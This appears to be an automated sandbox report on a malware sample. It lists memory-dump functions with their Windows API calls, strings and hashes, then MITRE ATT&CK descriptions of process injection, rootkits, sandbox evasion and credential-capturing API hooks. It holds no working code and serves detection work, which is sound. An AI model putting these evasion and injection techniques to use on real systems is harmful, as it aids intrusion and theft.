Opcode Fuzzy Hash: a66fa35b3c76497b441bcc5cebf2e3146f578b463e91b26ceffef1be27566ccf
Instruction Fuzzy Hash: 4490026134280843E500A1588554B060045D7E1301F51C419E1054558DC729CC527226

Uniqueness

Uniqueness Score: -1.00%

Function 02FF2F00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02FF2F0A

Memory Dump Source

Source File: 00000008.00000002.26925337058.0000000002F80000.00000040.00000001.sdmp, Offset: 02F80000, based on PE: true

Associated: 00000008.00000002.26926629640.00000000030A9000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.26926665832.00000000030AD000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c4d9a69d44b952c65a290dfb2b30a71858008d1e1f9d47a5c91dc7ead8957e70
Instruction ID: c107d318a7f4f71675cb97c662994c37b943f04c85355e498e793b1b5e9c8f6e
Opcode Fuzzy Hash: c4d9a69d44b952c65a290dfb2b30a71858008d1e1f9d47a5c91dc7ead8957e70
Instruction Fuzzy Hash: 65900221212C0443E600A5688D54B07004597D0303F51C519A0144558CCA2588616621

Uniqueness

Uniqueness Score: -1.00%

Function 02FF2CF0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02FF2CFA

Memory Dump Source

Source File: 00000008.00000002.26925337058.0000000002F80000.00000040.00000001.sdmp, Offset: 02F80000, based on PE: true

Associated: 00000008.00000002.26926629640.00000000030A9000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.26926665832.00000000030AD000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d0c25924374475755fd62a5bce52e74aa976d20d2da92db73f685d9d71079429
Instruction ID: 85656b624e384eb83184aa6c713f21f133aa30a80274fb67ee02ad2015132cc3
Opcode Fuzzy Hash: d0c25924374475755fd62a5bce52e74aa976d20d2da92db73f685d9d71079429
Instruction Fuzzy Hash: BC90022124384553A945F15885445074046A7E0341B91C416A1404954CC6369856E721

Uniqueness

Uniqueness Score: -1.00%

Function 02FF2C30, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02FF2C3A

Memory Dump Source

Source File: 00000008.00000002.26925337058.0000000002F80000.00000040.00000001.sdmp, Offset: 02F80000, based on PE: true

Associated: 00000008.00000002.26926629640.00000000030A9000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.26926665832.00000000030AD000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4f7b4b27d64356470d9f73ec3ee75f77f0e04d1d95329091ed645665acbd6c5a
Instruction ID: dc3c801ed24f0b7c443f68bfdb2c722568b6f6ff63a4ed91fee59fcc969ae90b
Opcode Fuzzy Hash: 4f7b4b27d64356470d9f73ec3ee75f77f0e04d1d95329091ed645665acbd6c5a
Instruction Fuzzy Hash: 0B90022921380403E580B158954860A004597D1302F91D819A000555CCCA2588696321

Uniqueness

Uniqueness Score: -1.00%

Function 02FF2DC0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02FF2DCA

Memory Dump Source

Source File: 00000008.00000002.26925337058.0000000002F80000.00000040.00000001.sdmp, Offset: 02F80000, based on PE: true

Associated: 00000008.00000002.26926629640.00000000030A9000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.26926665832.00000000030AD000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4bb4d1c03c8881ff5b564c0109c448740de323dfad42d84f48d169ecb1c4f5a2
Instruction ID: f22f5c398abfaf457dd47409da52bcbc2af2350865f6a691e5dd20e4d97cb345
Opcode Fuzzy Hash: 4bb4d1c03c8881ff5b564c0109c448740de323dfad42d84f48d169ecb1c4f5a2
Instruction Fuzzy Hash: BA90027120280803E540B1588544746004597D0301F51C415A5054558EC7698DD57765

Uniqueness

Uniqueness Score: -1.00%

Function 02FF2D10, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02FF2D1A

Memory Dump Source

Source File: 00000008.00000002.26925337058.0000000002F80000.00000040.00000001.sdmp, Offset: 02F80000, based on PE: true

Associated: 00000008.00000002.26926629640.00000000030A9000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.26926665832.00000000030AD000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 19a228b62b22ff57f044909916c4609fc8769ba7f1dd64273d16c73ec000037b
Instruction ID: dde17a3e8b62e5207905081b89bbf7783b66834220cd3eea4f4576649b14bf51
Opcode Fuzzy Hash: 19a228b62b22ff57f044909916c4609fc8769ba7f1dd64273d16c73ec000037b
Instruction Fuzzy Hash: DD90023120280813E511A1588644707004997D0341F91C816A041455CDD7668952B221

Uniqueness

Uniqueness Score: -1.00%

Function 02819070, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 02819118

Strings

net.dll, xrefs: 028190E1, 02819167, 0281913F, 0281914B, 02819173
wininet.dll, xrefs: 028190CE, 028190D7

Memory Dump Source

Source File: 00000008.00000002.26922800429.0000000002800000.00000040.00020000.sdmp, Offset: 02800000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 19b2dc4e8be44f3f682210694da1f207c9745981d98c44c8e79c3de727ddc7e6
Instruction ID: 287ea2835f13b4f5d38451674055dbc833186fb7fbe1b7c99029e154dd523f48
Opcode Fuzzy Hash: 19b2dc4e8be44f3f682210694da1f207c9745981d98c44c8e79c3de727ddc7e6
Instruction Fuzzy Hash: FF3190BAA00744BBD724DF68C885F67B7B9BB48B04F00841DF62E9B284D734A550CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0281906E, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 79sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 02819118

Strings

net.dll, xrefs: 028190E1, 0281913F, 0281914B
wininet.dll, xrefs: 028190CE, 028190D7

Memory Dump Source

Source File: 00000008.00000002.26922800429.0000000002800000.00000040.00020000.sdmp, Offset: 02800000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: aa4d44711ca18aaaa79f7b30b4e5bc5f2b392bcbcf8731d551ce50dfb8019764
Instruction ID: b890372bbb8687f5dd83ce4910535132bc95f7b8b51b07656e09719693b2d9b5
Opcode Fuzzy Hash: aa4d44711ca18aaaa79f7b30b4e5bc5f2b392bcbcf8731d551ce50dfb8019764
Instruction Fuzzy Hash: 4F21D3B9A40304BBD714DF68C885F6BBBB9FB48704F10802DE62D9B285D774A550CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0281A660, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02803AF8), ref: 0281A68D

Strings

.z`, xrefs: 0281A67C, 0281A688

Memory Dump Source

Source File: 00000008.00000002.26922800429.0000000002800000.00000040.00020000.sdmp, Offset: 02800000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: e450b10efec2fef37bd57600cfa66fe8bbb703803b66f1a3ef66312c99352817
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: 3CE01AB52002046BD718DF59CC44EA777ADAF88750F014554B91D57241C631E910CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 0281A65C, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02803AF8), ref: 0281A68D

Strings

.z`, xrefs: 0281A67C, 0281A688

Memory Dump Source

Source File: 00000008.00000002.26922800429.0000000002800000.00000040.00020000.sdmp, Offset: 02800000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 6950bb7f4041b067da6922c927cc9e511c6b5bb9f763e7a52b1bf3e1509d2bfe
Instruction ID: b87d93378d44ee7049b3ba8b5a2e95b97479a58752bc5b504e37e323cb0a8136
Opcode Fuzzy Hash: 6950bb7f4041b067da6922c927cc9e511c6b5bb9f763e7a52b1bf3e1509d2bfe
Instruction Fuzzy Hash: AEE0CDB82142409FEB14EF6DD4D08AB379AFF803147144945F85D87646C631D429CB71

Uniqueness

Uniqueness Score: -1.00%

Function 02808309, Relevance: 3.1, APIs: 2, Instructions: 57threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0280836A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0280838B

Memory Dump Source

Source File: 00000008.00000002.26922800429.0000000002800000.00000040.00020000.sdmp, Offset: 02800000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 39d28aad6bbed4b8213875cf0d94a5d8cf2aa37cf0b76b0f7ce664773d7f7057
Instruction ID: ef8d6a16a5205fb149c6d399510d41255286189dc91bcb1a648ade91195ea365
Opcode Fuzzy Hash: 39d28aad6bbed4b8213875cf0d94a5d8cf2aa37cf0b76b0f7ce664773d7f7057
Instruction Fuzzy Hash: 1201FC79A803287BE725A6588C42FFE7B2D9F40B51F094128FF04FB1C1D7A4650647E6

Uniqueness

Uniqueness Score: -1.00%

Function 02808310, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0280836A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0280838B

Memory Dump Source

Source File: 00000008.00000002.26922800429.0000000002800000.00000040.00020000.sdmp, Offset: 02800000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 9f6b7254b568deafea19610ad2f149634f201f71034e907c959efec66b5b2edc
Instruction ID: 291755445061f69a797207f0e026d838547e7b6d488d033e21e36d1e363864f6
Opcode Fuzzy Hash: 9f6b7254b568deafea19610ad2f149634f201f71034e907c959efec66b5b2edc
Instruction Fuzzy Hash: 9C01A279A8032877E720A6989C42FBE7B6D6F40B51F094119FF04FA1C1E6A469064AF6

Uniqueness

Uniqueness Score: -1.00%

Function 0280ACE0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0280AD52

Memory Dump Source

Source File: 00000008.00000002.26922800429.0000000002800000.00000040.00020000.sdmp, Offset: 02800000, based on PE: false

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
Instruction ID: 976a83ece626be01e4eec24d57ec667dca38ded568db1e2899f8a2ff074e96f8
Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
Instruction Fuzzy Hash: 0F010CBDD4020DABDB14EAA4DC81F9DB3799B54308F108195AA1CD7280FA31EA148B92

Uniqueness

Uniqueness Score: -1.00%

Function 0281A6D0, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0281A724

Memory Dump Source

Source File: 00000008.00000002.26922800429.0000000002800000.00000040.00020000.sdmp, Offset: 02800000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: 5f71286ec208d13fd35b4fa1708373e94ba7db81f2e20b18c7dde878c96699a8
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: F101AFB6210108AFCB58DF89DC80EEB77ADAF8C754F158258BA0D97240C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0281A6CD, Relevance: 1.5, APIs: 1, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0281A724

Memory Dump Source

Source File: 00000008.00000002.26922800429.0000000002800000.00000040.00020000.sdmp, Offset: 02800000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 05190fc44bc1cc6625a2a28bb8d322c710f0a1df1085e7d431e6cf86c5f1c3b3
Instruction ID: 863245430b3f6e0ff5c964626fcf0ee42e9fe49035fa73fc9ff916ba1a05c659
Opcode Fuzzy Hash: 05190fc44bc1cc6625a2a28bb8d322c710f0a1df1085e7d431e6cf86c5f1c3b3
Instruction Fuzzy Hash: 2D01A4B6201108AFDB54DF89DC80EEB77ADAF8C354F158248FA1D97240C630E851CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0281A7B1, Relevance: 1.5, APIs: 1, Instructions: 38COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0280F1C2,0280F1C2,?,00000000,?,?), ref: 0281A7F0

Memory Dump Source

Source File: 00000008.00000002.26922800429.0000000002800000.00000040.00020000.sdmp, Offset: 02800000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 8256bb23083fe9e0ef0366e9fe3f044f80eab435274cd366427f49c344edee74
Instruction ID: 1826c41800d1e526d7b8c82f6ce1deebc460843fe0f9cfad16468dec0001144f
Opcode Fuzzy Hash: 8256bb23083fe9e0ef0366e9fe3f044f80eab435274cd366427f49c344edee74
Instruction Fuzzy Hash: BAF090B92002086FDB10DF99DC84EE7779D9F85320F144654F95C97280D531E8028AB0

Uniqueness

Uniqueness Score: -1.00%

Function 028191A0, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0280F040,?,?,00000000), ref: 028191DC

Memory Dump Source

Source File: 00000008.00000002.26922800429.0000000002800000.00000040.00020000.sdmp, Offset: 02800000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: dfd687a368151b96c951bdfed8c57082f8c90fd7efff9cd705ea1fad239337be
Instruction ID: 5ca469a8f3cd36e4dbb27daed59b5fd42d56f67620325c12f6db4fd6ff2a94b8
Opcode Fuzzy Hash: dfd687a368151b96c951bdfed8c57082f8c90fd7efff9cd705ea1fad239337be
Instruction Fuzzy Hash: 11E06D7B3903043AE320659DAC02FA7B79C8B91B20F140026FB0DEB2C0D595F44146A5

Uniqueness

Uniqueness Score: -1.00%

Function 02819194, Relevance: 1.5, APIs: 1, Instructions: 33threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0280F040,?,?,00000000), ref: 028191DC

Memory Dump Source

Source File: 00000008.00000002.26922800429.0000000002800000.00000040.00020000.sdmp, Offset: 02800000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 4cdf76780e9f98215a9692b6918e87f34ddcba79cab62a20ed269ac588de7a7b
Instruction ID: 4f9cfc262d768bb000e699a37eacabf36855ebca72b4ed7e7c81097bd2e23714
Opcode Fuzzy Hash: 4cdf76780e9f98215a9692b6918e87f34ddcba79cab62a20ed269ac588de7a7b
Instruction Fuzzy Hash: 15F0E57A69020036E63019588C02F97725C9F45B20F18012AFB08FB1C0D5A4B84186A4

Uniqueness

Uniqueness Score: -1.00%

Function 0281A620, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(02814526,?,02814C9F,02814C9F,?,02814526,?,?,?,?,?,00000000,00000000,?), ref: 0281A64D

Memory Dump Source

Source File: 00000008.00000002.26922800429.0000000002800000.00000040.00020000.sdmp, Offset: 02800000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: ec3fefbea07327e2e54735111b5a4180c0bea86c4eb8df5de74b941603405f39
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: CDE01AB5200204ABD714DF59CC40EA777ADAF88654F114558BA1D5B241C531F910CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 0281A7C0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0280F1C2,0280F1C2,?,00000000,?,?), ref: 0281A7F0

Memory Dump Source

Source File: 00000008.00000002.26922800429.0000000002800000.00000040.00020000.sdmp, Offset: 02800000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: 79e7ee0809cee83cddcc81ffcd7091d132215e86d20ab2c3478bcfa2a10cd508
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: 2BE01AB52002086BDB14DF49CC84EE737ADAF88650F018154BA0D57241C931E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0280F6B7, Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,02808D14,?), ref: 0280F6EB

Memory Dump Source

Source File: 00000008.00000002.26922800429.0000000002800000.00000040.00020000.sdmp, Offset: 02800000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 1dd3988ecb5173c7baf754644da58b2259247c9bd3e19e6252ff6bf588a2365e
Instruction ID: 93b0f1cbb9536781d877be324c1973d88040df0b1aab6058cc1b6e6a55b8174b
Opcode Fuzzy Hash: 1dd3988ecb5173c7baf754644da58b2259247c9bd3e19e6252ff6bf588a2365e
Instruction Fuzzy Hash: 27E0C27A6402006AEB20FAA8AC43FEA3B999B15354F080068F949E76C3EA50D0008E52

Uniqueness

Uniqueness Score: -1.00%

Function 0280F6C0, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,02808D14,?), ref: 0280F6EB

Memory Dump Source

Source File: 00000008.00000002.26922800429.0000000002800000.00000040.00020000.sdmp, Offset: 02800000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
Instruction ID: b0e47a8e1b37cb3dfd950a0f51baa241e3d3833ea7516599923e729680092166
Opcode Fuzzy Hash: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
Instruction Fuzzy Hash: 9CD05E6A6503042BEA10BAA89C02F26328D5B55B14F494064FA48D72C3D954E0004565

Uniqueness

Uniqueness Score: -1.00%

Function 02FF2B2A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02FF2B44

Memory Dump Source

Source File: 00000008.00000002.26925337058.0000000002F80000.00000040.00000001.sdmp, Offset: 02F80000, based on PE: true

Associated: 00000008.00000002.26926629640.00000000030A9000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.26926665832.00000000030AD000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 22647a3de6ec387087b074788773968fe943561b3fea34bffb90abd99f16b2b1
Instruction ID: e6d0505ed696e47e33f5940b006a9a868bf037d4999a1e9a9f6c3db72e07a1d5
Opcode Fuzzy Hash: 22647a3de6ec387087b074788773968fe943561b3fea34bffb90abd99f16b2b1
Instruction Fuzzy Hash: 84B09272D028C9CAEA51EB708B48B1B7A40BBD0742F26C466E7460686E8738C491F276

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0281731A, Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.26922800429.0000000002800000.00000040.00020000.sdmp, Offset: 02800000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c14f52a656e223d1bbce2250d79eb8312ae84c9e3c237ef15c68c528b7c0b0c
Instruction ID: c8e36cf4f0fdc657a37658762e89ee55b1640247276db64de30c057031c56348
Opcode Fuzzy Hash: 3c14f52a656e223d1bbce2250d79eb8312ae84c9e3c237ef15c68c528b7c0b0c
Instruction Fuzzy Hash: BAB0927AF18204468A209E4AF400079F3F6EED3222F1032BBC948F3110E5228022869E

Uniqueness

Uniqueness Score: -1.00%

Function 02FE7550, Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03024530
Execute=1, xrefs: 0302451E
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03024460
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0302454D
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 03024507
ExecuteOptions, xrefs: 030244AB
CLIENT(ntdll): Processing section info %ws..., xrefs: 03024592

Memory Dump Source

Source File: 00000008.00000002.26925337058.0000000002F80000.00000040.00000001.sdmp, Offset: 02F80000, based on PE: true

Associated: 00000008.00000002.26926629640.00000000030A9000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.26926665832.00000000030AD000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 3ce5760db93f7671cda5e1b7ce3c8b9e756d306dde456988947a387570bdb078
Instruction ID: 1c71e24d884a0c0227f48982f270594098cc986d9a69bee27faa015027af2da4
Opcode Fuzzy Hash: 3ce5760db93f7671cda5e1b7ce3c8b9e756d306dde456988947a387570bdb078
Instruction Fuzzy Hash: 33510B71A013197AEF11FB95EC85FAEB7A9EF44384F0405A9D706A7281DB709A41CF50

Uniqueness

Uniqueness Score: -1.00%

Function 02FB9046, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

@, xrefs: 02FB9095
$, xrefs: 02FB90B1

Memory Dump Source

Source File: 00000008.00000002.26925337058.0000000002F80000.00000040.00000001.sdmp, Offset: 02F80000, based on PE: true

Associated: 00000008.00000002.26926629640.00000000030A9000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.26926665832.00000000030AD000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: fa0d4db4ea2ac34efa362530f73adc864920da173c9165429582b749e8207fbf
Instruction ID: 422b979ed548241577456239e43d7f7d6189cef5e4e903ad7df60ea918939b6e
Opcode Fuzzy Hash: fa0d4db4ea2ac34efa362530f73adc864920da173c9165429582b749e8207fbf
Instruction Fuzzy Hash: 40813A71D012699BDB35DF54CC44BEEB6B8AF08750F0445EAEA09B7280E7709E84DFA4

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

